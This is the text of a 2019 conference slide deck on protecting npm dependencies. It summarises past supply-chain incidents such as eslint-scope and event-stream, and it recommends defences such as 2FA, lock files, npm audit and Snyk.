ALL YOUR PACKAGES ARE BELONG TO US
Protecting your npm dependencies
@CHRISLAUGHLIN
WHO AM I?
Jack of all trades master of none
Worst hangover I have ever had
@CHRISLAUGHLIN
STORY TIME
@CHRISLAUGHLIN
@CHRISLAUGHLIN
@CHRISLAUGHLIN
@CHRISLAUGHLIN
@CHRISLAUGHLIN
@CHRISLAUGHLIN
SO WHAT HAPPENED?
@CHRISLAUGHLIN
i have a confession to make
Incidents
@CHRISLAUGHLIN
@CHRISLAUGHLIN
ESLINT-SCOPE
When:
impact:
aim:
entry:
protection:
July 12th 2018
Steal data from .npmrc files
~10,000,000 weekly downloads
The attacker released a new version of the module which added a install script which fetched code from pastebin. This then sent the npmrc contents to the hackers.
-
Make all contributors enable 2FA
-
Ensure that you lock down package versions and use a package-lock file
@CHRISLAUGHLIN
EVENT-STREAM
When:
impact:
aim:
entry:
protection:
November 26th 2018 (unnoticed for 2 months)
Steal Dash Copay Bitcoin wallets
~1,000,000 weekly downloads
Handover of package access
-
Ensure that you lock down package versions and use a package-lock file
-
Rethink how the community manages package ownership?
@CHRISLAUGHLIN
CROSSENVS
When:
impact:
aim:
entry:
protection:
August 2nd 2017
Steal env properties
~700 downloads in total (similar attack used on another 40 packages)
Fake packages names that are close to existing packages
-
Check out the package information before installing
-
NPM added name checks
@CHRISLAUGHLIN
ELECTRON-NATIVE-NOTIFY
When:
impact:
aim:
entry:
protection:
June 6th 2019
Steal bitcoin wallet data ($13 million USD in cryptocurrency )
~600 weekly downloads
Release new version of trusted dependency
-
Ensure that you lock down package versions and use a package-lock file
tools & workflows
@CHRISLAUGHLIN
npm audit
@CHRISLAUGHLIN
-
Added to npm v6
-
Runs after each npm install
-
All dev, bundled and optional dependencies.
-
Auto fix by running npm audit fix or run the recommended commands
@CHRISLAUGHLIN
@CHRISLAUGHLIN
Snyk.io
-
Cloud based solution
-
Integration with multiple source control solutions
-
On demand or scheduled vulnerability scanning
-
Weekly reports
-
Dashboard
@CHRISLAUGHLIN
@CHRISLAUGHLIN
github
@CHRISLAUGHLIN
-
Linked to your github source
-
Growing vuln database
-
Potential integration with new package repository
@CHRISLAUGHLIN
@CHRISLAUGHLIN
conclusion
@CHRISLAUGHLIN
Questions?
@CHRISLAUGHLIN
NIDC 2019 - All your packages are belong to us
By Chris Laughlin
NIDC 2019 - All your packages are belong to us
- 482